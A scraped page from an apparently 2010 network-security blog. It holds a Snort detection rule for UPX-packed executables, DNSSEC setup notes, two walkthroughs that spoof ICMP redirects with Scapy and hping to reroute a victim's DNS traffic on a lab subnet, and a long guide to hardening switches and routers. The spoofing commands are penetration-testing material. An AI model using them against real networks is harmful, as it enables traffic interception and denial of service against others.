alert udp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over UDP"; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963301; rev:1;)Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-28615112659590619242010-11-10T08:32:00.000-08:002010-11-10T08:32:03.453-08:00DNSSEC NotesQuick and dirty DNSSEC recipe:<br />
<br />
1) named.conf global options<br />
<br />
options {<br />
dnssec-enable yes;<br />
dnssec-validation yes;<br />
};<br />
<br />
1.5) "root" zone trusted key<br />
<br />
get root key: <br />
dig +multi +noall +answer DNSKEY . >root.dnskey<br />
<br />
convert to DS RR set:<br />
dnssec-dsfromkey -f root.dnskey . >root.ds<br />
<br />
include in named.conf:<br />
<br />
managed-keys {<br />
"." initial-key 257 3 8 "<br />
blah blah blah ";<br />
};<br />
<br />
2) Generating key signing key (KSK) and zone signing key (ZSK)<br />
<br />
ZSK: dnssec-keygen -r /dev/random -a RSASHA1 -b 1024 -n ZONE myzone.name<br />
KSK: dnssec-keygen -r /dev/random -f KSK -a RSASHA1 -b 1280 -n ZONE myzone.name<br />
<br />
3) Inside your zone file, include the public keys<br />
<br />
$include Kmyzone.name.+005+1234.key ;ZSK<br />
$include Kmyzone.name.+005+4567.key ;KSK<br />
<br />
4) Sign the DNS zone<br />
<br />
dnssec-signzone -r /dev/random -o myzone.name -k Kmyzone.name.+005+1234 myzone.name Kmyzone.name.+005.4567.key<br />
<br />
5) Verify the signed zone records:<br />
<br />
cat myzone.name.signed<br />
<br />
6) Check a query...<br />
<br />
dig +dnssec www.myzone.name A<br />
<br />
Note: data for which a local name server is authoritative for, and comes from disk will not result in the trust chain traversal. ie: It is assumed that if a server can read the zone off disk, then it is secure anyway.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-45940638000107883682010-06-04T12:05:00.000-07:002010-06-10T13:45:41.960-07:00Better spoofing of ICMP host redirect messages with ScapyScapy is a packet crafting tool written in Python that offers very fine-grained OSI layer 2, 3, and 4 control of header fields. Scapy will do some things for you automatically if you don't fill in all of the fields in any specific header. Examples of this might be the IP total length field, IP version number, TCP or UDP length fields, and checksum values.<br />
<br />
Unlike Hping, when Scapy is used to send ICMP redirects, it does a fine job of calculating all additional fields correct and filling in all required checksums to make things happen correctly. For people familiar with software development, and detailed packet header information, Scapy is an ideal tool.<br />
<br />
I used an Ubuntu system to test Scapy out for ICMP redirect activity, obtaining it as follows: "sudo apt-get install python-scapy".<br />
<br />
In this scenario, our legitimate router gateway is 192.168.128.2, and our victim/target host is 192.168.128.128. We are going to spoof an ICMP redirect for the /32 host route 10.1.1.1, redirecting that address to the new gateway of 192.168.128.136.<br />
<br />
After installing scapy, we will run as root to ensure that we can craft packets from the attacker's ethernet interface. Along the way, we will instantiate different objects representing the various layer 3 and 4 headers that we require. In this case, we require an IP datagram, with ICMP as well as another IP payload to be delivered inside the ICMP payload.<br />
<br />
<pre>Welcome to Scapy (2.0.0.5 beta)
>>> ip=IP()
>>> ip.src='192.168.128.2'
>>> ip.dst='192.168.128.128'
>>> ip.display
<bound method IP.display of < ip src=192.168.128.2 dst=192.168.128.128 |>>
</pre><br />
Now, we go forward and set the ICMP parameters as follows, type=5 for redirect, and code=1 for host, and then set the gateway destination.<br />
<br />
<pre>>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='192.168.128.136'
>>> icmp.display
<bound method ICMP.display of <icmp type=redirect code=1 gw=192.168.128.136 |>>>
>>> icmp.display()
###[ ICMP ]###
type= redirect
code= 1
chksum= 0x0
gw= 192.168.128.136
</pre><br />
I deliberately used two different methods for displaying the ICMP object properties to illustrate that you can display either the full header or only the modified fields. <br />
<br />
At this stage, we need to create the payload of the ICMP packet itself. This is important because the IP destination address is what becomes the route table host entry when the redirect is sent to the victim. We will set the IP source address within the ICMP payload to be the victim host address since this "would have been" the originator of the packet that elicited the ICMP redirect in a legitimate situation.<br />
<br />
<pre>>>> ip2=IP()
>>> ip2.src='192.168.128.128'
>>> ip2.dst='10.1.1.1'
>>> ip2.display
<bound method IP.display of <IP src=192.168.128.128 dst=10.1.1.1 |>>
</pre><br />
<br />
The layer 4 portion of the ICMP payload can be anything we like. In this example, we will use Scapy's UDP() method which defaults to looking a lot like a DNS header. Since the defaults are pretty good, we don't need to use a Scapy variable. We can send out our ICMP datagram because it is now fully assembled!<br />
<br />
>>> send(ip/icmp/ip2/UDP())<br />
.<br />
Sent 1 packets.<br />
>>> <br />
<br />
When packet crafting for research or especially penetration testing work, you should always have 'tcpdump' running and at minimum displaying packet data, if not writing it to disk:<br />
<br />
sudo tcpdump -ennvvX -i eth0 -s1514 'icmp'<br />
[sudo] password for deadlist: <br />
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 bytes<br />
08:55:19.971914 00:0c:29:e3:3f:d3 > 00:0c:29:4d:99:8f, ethertype IPv4 (0x0800), length 70: (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto ICMP (1), length 56)<br />
192.168.128.2 > 192.168.128.128: ICMP redirect 10.1.1.1 to host 192.168.128.136, length 36<br />
(tos 0x0, ttl 64, id 1, offset 0, flags [none], proto UDP (17), length 28)<br />
192.168.128.128.53 > 10.1.1.1.53: [udp sum ok] [|domain]<br />
0x0000: 4500 0038 0001 0000 4001 f8f0 c0a8 8002 E..8....@.......<br />
0x0010: c0a8 8080 0501 0612 c0a8 8088 4500 001c ............E...<br />
0x0020: 0001 0000 4011 2ea6 c0a8 8080 0a01 0101 ....@...........<br />
0x0030: 0035 0035 0008 b349 .5.5...I<br />
<br />
And there we have it folks! Scapy is a fascinating tool for exploring all sorts of packet crafting ideas and because it's Python, you can have lots of fun scripting things to your heart's content.</ip >Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2320276621879394553.post-10623774489106153532010-05-26T12:54:00.000-07:002010-06-08T08:06:12.945-07:00Spoofing ICMP redirect host messages with hpingAn icmp redirect host message can be sent from any router on the same broadcast segment as the end host that "needs redirection". Modern network infrastructures will typically have a single router gateway address per subnet however it is possible to have more than one router in a segment making the operational case for ICMP redirect messages.<br />
<br />
An ICMP redirect host message has ICMP type 5, code 1. The ICMP redirect network code is 0. There also exists redirect with Type of Service (ToS) for both network and host (codes 2 and 3).<br />
<br />
With the advent of classless Internet domain routing (CIDR, RFC 1518/1519 in 1993), an end host cannot readily determine the network class and thus ICMP type 5, code 0 is basically useless. RFC 1812 additionally states that a router should not generate type 5, code 0. While working on this post, I observed that a Windows host will accept code 0 and treat it the same as code 1 adding a /32 route to the table. <br />
<br />
Because IP source address spoofing is trivial, ICMP redirect message abuse potential exists. The only specific limitation is that the "new" destination gateway address of the redirect message must exist within the same subnet as the end host itself.<br />
<br />
The ICMP redirect use case would most likely be employed in a network penetration testing scenario whereby extensive layer 2 security features are enabled limiting the effectiveness of layer 2 attacks such as ARP cache poisoning and rogue DHCP server use. The primary goal being to intercept traffic for a specific destination address.<br />
<br />
The end host must be configured to accept ICMP redirect messages and update its routing table accordingly. Within Microsoft Windows, there is a registry key that enables the acceptance of ICMP redirect messages. This DWORD registry key has a default setting of 0x0001, that being the "enabled" state. <br />
<br />
HKLM\System\CurrentControlSet\Services\Parameters\Tcpip\EnableICMPRedirect<br />
<br />
Based on my reading, I believe some implementations of the Microsoft TCP/IP stack also read the plural form of this key "EnableICMPRedirects" rather than the singular form, so it is possible that both keys exist.<br />
<br />
With regard to the Windows XP firewall, it will block all ICMP requests in its default configuration state. Of course, there may be site wide group policy that changes this situation for legitimate operational reasons such as multiple router gateways existing in a single segment. If you wish to experiment, and enable 'icmp redirect' from the command line, there are two useful 'netsh' commands as follows:<br />
<br />
C:\> netsh firewall show icmpsetting<br />
<br />
shows the current state of ICMP acceptance if any. A blank output indicates that no ICMP policies are in effect.<br />
<br />
C:\> netsh firewall set icmpsetting type=5 mode=enable<br />
<br />
will enable the acceptance of ICMP redirects through the firewall.<br />
<br />
<br />
The Linux kernel has two settings that control ICMP redirect acceptance behavior. For the 'eth0' interface, these settings are as follows:<br />
<br />
/proc/sys/net/ipv4/conf/eth0/accept_redirects<br />
/proc/sys/net/ipv4/conf/eth0/secure_redirects<br />
<br />
If "secure_redirects" is enabled, the Linux system will only accept ICMP redirects that are redirected to a default gateway that is already listed in the routing table. This is the default in most modern linux distributions and is an effective defense against spoofing attempts.<br />
<br />
'accept_redirects' is enabled as the default also. If the 'secure_redirects' kernel parameter is set to 0, then the linux kernel is susceptible to an ICMP host redirect attack in the same way that a Windows system is susceptible. The one thing to note is that the linux kernel will not show the accepted route in the routing table that is listed through 'route show' or 'netstat -nr' commands, even though the route is in effect.<br />
<br />
<br />
Our scenario below is laid out as follows:<br />
<br />
Attacker IP Address: 172.16.235.99<br />
Legitimate Router Gateway: 172.16.235.1<br />
Victim IP Address: 172.16.235.100<br />
<br />
The legitimate DNS server address is 10.1.1.1.<br />
<br />
We can use ICMP redirect host to insert a new route table entry for the 10.1.1.1 address as follows:<br />
<br />
hping -I eth-dest -C 5 -K 1 -a 172.16.235.1 --icmp-ipdst 10.1.1.1 --icmp-gw 172.16.235.99 --icmp-ipsrc 172.16.235.100 172.16.235.100<br />
<br />
whereby:<br />
-I eth-dest is the destination ethernet interface on the attacker to send the packets out of/from.<br />
-a <ip> is the spoofed source address of the legit. router gateway</ip><br />
--icmp-ipdst <ip> is the new route table entry address you want to create</ip><br />
--icmp-gw <ip> is the new route destination address/gateway you want to create and must live within the same subnet as the victim.</ip><br />
--icmp-ipsrc <ip> must match the source address of the victim to pass sanity checking</ip><br />
<br />
If you check the route table on the victim using "netstat -nr" or "route print" after executing this command from the attacker, you should see a new route table entry. Since MS-Windows will readily accept these new route table entries, many ICMP redirects can be generated with random IPv4 prefixes to perform a denial of service against the target. A /32 host route learned via an ICMP redirect message will remain in the routing table for 10 minutes.<br />
<br />
In this example, we assumed that the attacker was on the same subnet in order to receive / intercept the traffic. In other words, the attacker would also be a DNS server ready to serve some bogus response to the victim. The attacking host could well be a different machine on another network, but the "man in the middle" host or "router gateway" if you like needs to remain on the same subnet in order to receive the traffic.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-62828435328173113572010-05-05T08:41:00.000-07:002010-06-04T14:07:11.374-07:00Network Infrastructure Defense Really Matters!<div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In today’s world of focused client side device attacks, many security analysts and network security engineers have lost sight of defense configurations that can really make a sizable impact in slowing down network intrusion activity. This article is about network infrastructure precautions that, when sensibly deployed, can assist greatly in defense posture. I will focus both on general recommendations and specific Cisco features in the enterprise LAN space.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><u><b>Network Access / Layer 2 Defenses</b></u></span></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. DHCP Protocol Snooping</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">The DHCP snooping feature is very effective at preventing rogue DHCP servers from operating on a network. A rogue DHCP server is most dangerous for its ability to deliver alternative Domain Name Server (DNS) addresses. The alternate DNS servers will of course deliver whatever custom DNS responses needed to intercept important traffic, re-direct traffic to fake websites etc. Typically, rogue DHCP server responses will always beat the response time of a central DHCP server due to its layer 2 network adjacency.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Most networks will have centrally deployed DHCP server(s) for IP address delivery. The DHCP snooping feature ensures that DHCP responses can only be transmitted from “trusted” network interfaces, usually interfaces which are uplinks to the core network infrastructure. This technology can be deployed on a per-Virtual LAN (VLAN) basis assuming the feature is present on the specific switch model in hand. (Cisco 3560/3750 switches make this feature available)</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If a “non-trusted” switch port receives a DHCP RESPONSE, or DHCP ACK packet, it can be configured to shutdown.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A side effect of deploying this feature is that a tracking table is built within the switch containing details such as the client IP address and MAC/Ethernet address information.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Dynamic Address Resolution Protocol (ARP) Inspection (DAI)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">DAI leverages the DHCP snooping table to ensure that IP address to MAC address mapping is consistent. It also has a denial of service (DoS) prevention feature to limit the rate of ARP packets on a network segment. DAI is very effective against broadcast gratuitous ARP traffic, typically used for traffic interception purposes by tools like “Ettercap”, and “Cain N’Able”.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>3. IP Source Guard</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Again, we leverage the DHCP snooping table and place a dynamic IP access list on ingress traffic to ensure that the source IP address for all packets on any one switch interface is indeed the system connected to this port.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>4. Switchport Security</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Essential to prevent the Content Addressable Memory (CAM) table from being flooded. All network switches track the bridging destination of a packet by it’s destination MAC address. The MAC addresses are placed into the CAM table which has a fixed / limited maximum size. On a typical Cisco switch, the CAM table defaults to 6,000 MAC address entries in the switches default mode. If the switch is optimized for desktop VLAN based switching, higher end switch models (such as the Catalyst 3750) can contain a maximum of 12,000 CAM entries.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">When the CAM table on a switch is filled up, the switch will flood/transmit all Ethernet frames out of all switch ports. It is a relatively trivial matter to write code to generate packets to random Ethernet destinations and thus quickly fill a switch CAM table. The goal is to effectively turn the switch into a hub and enable traffic interception.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If a switch can be configured to limit the number of CAM entries permitted on any single port, the CAM flooding attack is defeated.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>5. Broadcast Suppression (storm control)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">End devices generate broadcasts that are typically associated with ARP traffic. On a gigabit enabled Ethernet port, a 1% broadcast suppression level still leaves open the potential for up to 10Mbps of broadcast traffic. On a Cisco device, we can suppress down to 1% of link speed using “storm-control broadcast level 1”. Multicast can also be suppressed independently from broadcast on some devices.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In environments where multicast is in production use, network engineers need to assess the level of multicast required to/from any one access port and then suppress at that level.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Broadcast suppression is critical in avoiding denial of service (DoS) conditions that can either be created by operational errors, or by a security incident / malware.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u><b>Routing / Layer 3 Defenses</b></u></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Thinking in terms of “defense in depth”, layer 3 defenses act as a backup to the layer 2 defenses in place at the access layer of the network. Layer 3 defenses can be sub-divided into routing device protection (denial of service and infrastructure mapping protection), and network infrastructure protection. We will first consider the network infrastructure category.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. Disable Proxy ARP (no ip proxy-arp)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Proxy ARP is a feature which allows the router to act as proxy for any host in its adjacent sub-network. When enabled, proxy ARP allows an end host, with an IP address that falls within the sub-network address range, to set its sub-network mask (and broadcast) to almost anything, and still be able to communicate on the network. An end host could even set the smallest mask possible, eliminate a router gateway setting, and still be able to surf the entire IPv4 address space.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">The end host is allowed to logically appear on almost any network due to the router “proxying” address resolution of all things for that host. It can be used for denial of service attacks amongst other things.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Unicast Reverse Path Forwarding (uRPF) Sanity Check</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">The uRPF check ensures that the source IP address is reachable from the router interface that received the IP datagram. Cisco devices implement two forms of uRPF check; the strict form which looks at the specific interface the datagram is received on, versus the looser check which will match on any connected interface. The uRPF check is another critical measure which forms a “belt and suspenders” style backup to the IP Source Guard feature in order to defeat source IP address forgery/spoofing.<br />
<br />
Two Cisco IOS statements can be used to enforce uRPF sanity checking as follows:<br />
<br />
ip verify source reachable-via rx<br />
ip verify source reachable-via any</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>3. Disable forwarding of IP Options (no ip options)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">There are virtually no IPv4 datagrams on the network that require any IP options. The most dangerous IP options from a security perspective are:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Strict Source Route</u>: dictate which router hops a datagram must traverse, and record them.</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Loose Source Route</u>: specify optional router hops a datagram can traverse and record them.</div><div style="font-family: Georgia,"Times New Roman",serif;"><u>Record Route</u>: simply record the router hops a datagram must traverse.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">If record route IP options are permitted to be forwarded, they can be used for both reconnaissance and traffic interception purposes. In multicast rich environments, operators need to take note that the “Router Urgent” IP option is used within Internet Group Management Protocol (IGMP) transactions.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>4. Disable generation of ICMP type 3, destination unreachable messages (no ip unreachables)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A router that generates ICMP type 3 (unreachable) messages becomes a source of network reconnaissance information. For example:</div><div style="font-family: Georgia,"Times New Roman",serif;">(a) Type 3, code 0 – “Network Unreachable” can be used to map the internal sub-netting of a network.</div><div style="font-family: Georgia,"Times New Roman",serif;">(b) Type 3, code 1 – “Host Unreachable” can be used to discover individual hosts within a sub-network.</div><div style="font-family: Georgia,"Times New Roman",serif;">(c) Type 3, code 13 – “Administratively prohibited” is generated in the context of router Access Control List (ACL) deny statements, and thus can be used to fully map an access control list.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>5. Disable directed broadcast (no ip directed-broadcast)</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">A directed broadcast is generated when a datagram is address to a network address or to a network broadcast address. If we take the class C network of 192.168.99.0/24, and send a datagram to either the 192.168.99.0 or 192.168.99.255 address from outside of that sub-network, then the router interface will typically broadcast the datagram within the network segment/broadcast domain.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">This represents security risk in terms of potential network amplification attacks. A common attack from past history was to generate an ICMP ECHO datagram with a spoofed source IP address to a network broadcast address, and subsequently have ALL hosts within that sub-network respond with ICMP ECHO REPLY datagrams. This attack was commonly referred to as a “Smurf” attack.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">There are some protocols which depend on directed broadcast to function properly. Wake ON Lan (WOL) is one particular protocol which depends on being able to send UDP datagrams that contain MAC address payloads to a network broadcast address. If your environment requires WOL functionality, you can either filter directed broadcast by source address (for limited risk mitigation), or ensure that the WOL traffic is only generated within the network broadcast domain that will receive it.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In general, having the “no ip directed-broadcast” statement on all router interfaces is a best practice and has in fact become the Cisco IOS default. As stated above, you also have the option of “ip directed-broadcast ACLNAME” to exert more control. Note that you can make an ACL be very specific, down to layer 4 protocol and destination ports if you like however you are still risking DoS by allowing any directed broadcast.<br />
<br />
<b>6. Protect your router control-plane from DoS</b><br />
<br />
In the commonly deployed Catalyst-6500 line of router/switches, there are various rate limiters available to assist in protecting the control plane of the router. There are also some useful limits built into the dynamic world of multicast routing.<b> </b>Here are a few items that can be researched further and deployed to any one site's taste:<br />
<br />
ip pim register rate-limit<br />
ip multicast route-limit<br />
<br />
mls rate-limit<br />
- can apply to unicast, multicast, bridged traffic, or all traffic<br />
- can be applied in sub-systems such as ACL's, IP forwarding, and CEF<br />
<br />
Note that in the hardware based router models such as the Cat-6500, some of these rate limiters also impact ICMP transmission behavior, and interact with the switch virtual interface or routed interface configurations (such as: ip unreachables, and ip redirects).<br />
<br />
<br />
<br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><u><b>Internet Access Layer / Border Router Filtering Policy</b></u></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>1. Anti-spoofing and Layer 4 Protocol Filtering</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Anti-spoofing is a simple concept that needs to be a standard security practice. No datagram with a source address of your site’s IP address allocation should originate from outside of your network. Additionally, you should never send a datagram with your internal allocated network outside of your network.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Anti-spoofing controls can additionally be combined with Layer 4 protocol filtering to ensure that only the desired layer 4 protocols flow into/out of any network.</div><div style="font-family: Georgia,"Times New Roman",serif;">Lets imagine that your public address allocation is 240.55.0.0/16. Yes, I know this is considered to be IANA Class E reserved right now, but lets use it for our example. Lets also imagine that you want to perform anti-spoof filtering, and pass IPSEC related protocols, GRE, as well as ICMP, TCP, and UDP across your border routers.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In this example, Cisco IOS based ACL’s can be created as follows, and naturally on your border interface you would have “no ip unreachables” to prevent ACL mapping:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">ip access-list extended Border-Inbound</div><div style="font-family: "Courier New",Courier,monospace;"> 10 permit gre any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 20 permit ahp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 30 permit esp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 40 permit icmp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 50 permit tcp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 60 permit udp any 240.55.0.0 0.0.255.255</div><div style="font-family: "Courier New",Courier,monospace;"> 99 deny ip any any log-input</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">ip access-list extended Border-Outbound</div><div style="font-family: "Courier New",Courier,monospace;"> 10 permit gre 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 20 permit ahp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 30 permit esp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 40 permit icmp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 50 permit tcp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 60 permit udp 240.55.0.0 0.0.255.255 any</div><div style="font-family: "Courier New",Courier,monospace;"> 99 deny ip any any log-input</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">In all likelihood, your site may well have more strict ICMP policies than allowing all ICMP to pass through the border router interface(s). A policy which allows ICMP type 11 (time exceeded), for “traceroute” purposes, might be appropriate. Or even a policy that completely denies ICMP at the network border in some cases. It is common knowledge in the security community that ICMP has been used to tunnel other protocols, or as a control channel mechanism. ICMP Echo Request/Reply are often targeted for tunneling or command/control channel activities.</div><div style="font-family: Georgia,"Times New Roman",serif;"></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><b>2. Bogon address filtering</b></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Although IPv4 address resources are dwindling, there are still IP address blocks which are unallocated or reserved by the Internet Assigned Numbers Authority (IANA).</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><a href="http://www.iana.org/assignments/ipv4-address-space/">http://www.iana.org/assignments/ipv4-address-space/</a></div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Network security engineers should always filter/drop any datagram that arrives at their network edge with a reserved or unallocated source address. Within the interior of a network, any datagram that is destined for a reserved or unallocated address could either be null routed, or perhaps directed to a security device for analysis and/or detention. This is where we enter the realm of Tom Liston’s LaBrea Tarpit or perhaps a honeynet.org project.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Note that IP address allocations continue to happen and thus any security enforcement implementation that deals with unallocated address filtering / forwarding, needs to be updated on a regular basis.</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;">Team Cymru continues to main a bogon address space reference with various filtering techniques:</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><a href="http://www.team-cymru.org/Services/Bogons/">http://www.team-cymru.org/Services/Bogons/</a><br />
<br />
<b>3. Strategic Null Routing </b><br />
<br />
Create a static route for your shortest network prefix. If we take the same 240.55.0.0/16 network example above, then create a static route to null0 for this prefix within your routing infrastructure as follows:<br />
<br />
ip route 240.55.0.0 255.255.0.0 null0<br />
<br />
All of your connected sub-networks will have longer prefixes that the /16 null route example above, and thus traffic for all advertised routes within your network will get to destinations just fine. Any sub-network that you do not have allocated (dark space) will get dropped into the sink. You might also need a route like this to advertise to your upstream BGP provider anyway.<br />
<br />
You might want to null route some other address prefixes you don't want running around your public facing network, such as RFC-1918 space for example.<b> </b><br />
<br />
<b>4. Basic BGP Security Tips</b><br />
<br />
I don't claim to be an expert in BGP however some basic security principles can be applied as follows:<br />
<br />
(a) Include an ACL on your border interfaces to allow TCP port 179 traffic exclusively from your upstream BGP peering neighbor.<br />
(b) Use an MD5 hash/password with your BGP peers.<br />
(c) Use ip-prefix lists either directly or within route-maps to ensure that you are only advertising the prefixes you intend. If you have created a static null route for your entire network allocation, you might want to only advertise this prefix to your upstream.<br />
(d) Use ip-prefix lists to only accept the routes you desire from your upstream. You can filter unallocated IP space (bogons) using this prefix list. You might have reasons to accept only a subset of routes from a specific provider.<br />
(e) Set a maximum Autonomous System (AS) Path limit to limit risks of accepting an unusually long AS Path.<br />
<br />
<br />
<br />
</div><div style="font-family: Georgia,"Times New Roman",serif;"><br />
